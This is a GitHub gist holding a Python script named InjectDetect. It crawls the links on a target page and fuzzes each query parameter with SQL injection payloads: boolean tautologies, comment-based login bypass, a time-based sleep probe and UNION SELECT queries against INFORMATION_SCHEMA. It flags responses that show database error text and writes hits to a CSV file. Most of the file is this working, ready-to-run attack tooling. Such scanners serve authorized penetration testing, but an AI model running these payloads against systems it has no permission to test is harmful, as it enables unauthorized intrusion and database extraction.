@lukeswitz
Last active June 21, 2023 07:30
InjectDetect
#!/usr/bin/env python3
import requests
from urllib.parse import urljoin, urlparse, parse_qsl, urlencode, urlunparse
from bs4 import BeautifulSoup
import logging
import time
import csv
# Set up logging
logging.basicConfig(filename='sqli_detection.log', level=logging.INFO)
# Define base URL
base_url = "http://example.com"
# Define payloads
payloads = [
    # Boolean-based probes
    "' OR '1'='1'--", "' OR 1=1--", "' OR 1=1#", "' OR 2=2#",
    "' OR 'a'='a", "\" OR \"a\"=\"a", "') OR ('a'='a", "' OR 'x'='x",
    "0' OR '0'='0", "'||'a'||'",
    # Comment-based authentication bypass
    "admin' --", "admin' #", "admin'/*",
    # Time-based (blind)
    "' OR sleep(10)--",
    # Operator and string-function probes
    "' OR 'text' LIKE 't%'", "' OR 'text' = N'text'",
    "' OR 2 BETWEEN 1 AND 3", "' OR 'text' > 't'",
    "' OR 'text' < 'u'", "' OR ASCII('text') > 100",
    "' OR 'text' || 'a' = 'texta'",
    # UNION-based extraction
    "' UNION SELECT 'a', 'b', 'c'",
    "' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES",
    # Add more payloads as needed
]
# Define SQLi error messages
sqli_errors = [
    "you have an error in your sql syntax", "warning: mysql",
    "unclosed quotation mark", "adodb.field error",
    "mysql_fetch_array()", "syntax error",
    # Add more SQLi error messages as needed
]
# Extract all links from a page
def get_all_links(url):
    try:
        soup = BeautifulSoup(requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}, timeout=15).content, "html.parser")
        for link in soup.find_all("a"):
            href = link.get("href")
            if href:
                yield urljoin(url, href)
    except Exception as e:
        logging.error(f"Failed to get links from {url}: {e}")

# Validate if response contains SQLi error
def is_vulnerable(response):
    lower_case_response = response.lower()
    for error in sqli_errors:
        if error in lower_case_response:
            return True
    return False
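
# The payload list includes a time-based probe ("' OR sleep(10)--") that
# returns no error text, so is_vulnerable() can never flag it. A latency
# check is one way to catch it. Minimal sketch: is_time_delayed() is a
# hypothetical helper, and the 8-second threshold is an assumption tied to
# the 10-second sleep in that payload.
def is_time_delayed(url, threshold=8.0):
    start = time.monotonic()
    try:
        requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}, timeout=threshold + 7)
    except requests.exceptions.Timeout:
        return True  # the request outlived a generous timeout; treat as delayed
    return time.monotonic() - start > threshold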

# Fuzz each URL with payloads. Scraped links carry no literal FUZZ marker,
# so when one is absent the payload is injected into each query parameter
# in turn; URLs that do contain FUZZ are substituted directly.
def fuzz_url(url):
    parsed = urlparse(url)
    params = parse_qsl(parsed.query, keep_blank_values=True)
    for payload in payloads:
        if "FUZZ" in url:
            candidates = [url.replace("FUZZ", payload)]
        else:
            # Replace one parameter value at a time with the payload
            candidates = [
                urlunparse(parsed._replace(
                    query=urlencode(params[:i] + [(name, payload)] + params[i + 1:])))
                for i, (name, _) in enumerate(params)
            ]
        for fuzzed_url in candidates:
            try:
                response = requests.get(fuzzed_url, headers={'User-Agent': 'Mozilla/5.0'}, timeout=15).text
                if is_vulnerable(response):
                    logging.info(f"Potential vulnerability found at {fuzzed_url} with payload {payload}")
                    with open('vulnerable_urls.csv', 'a', newline='') as file:
                        csv.writer(file).writerow([fuzzed_url, payload])
                time.sleep(1)  # rate limit
            except Exception as e:
                logging.error(f"Failed to fuzz {fuzzed_url}: {e}")

# Fuzz every link found on the base page (swap in crawl(base_url) to go deeper)
for url in get_all_links(base_url):
    fuzz_url(url)
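
# Example usage (assumption: you are authorized to test the target).
# Point base_url at a page whose links include query strings, or at a URL
# carrying a literal FUZZ marker, then run the script (filename illustrative):
#   python3 injectdetect.py
# Hits are appended to vulnerable_urls.csv as (url, payload) rows and
# logged to sqli_detection.log.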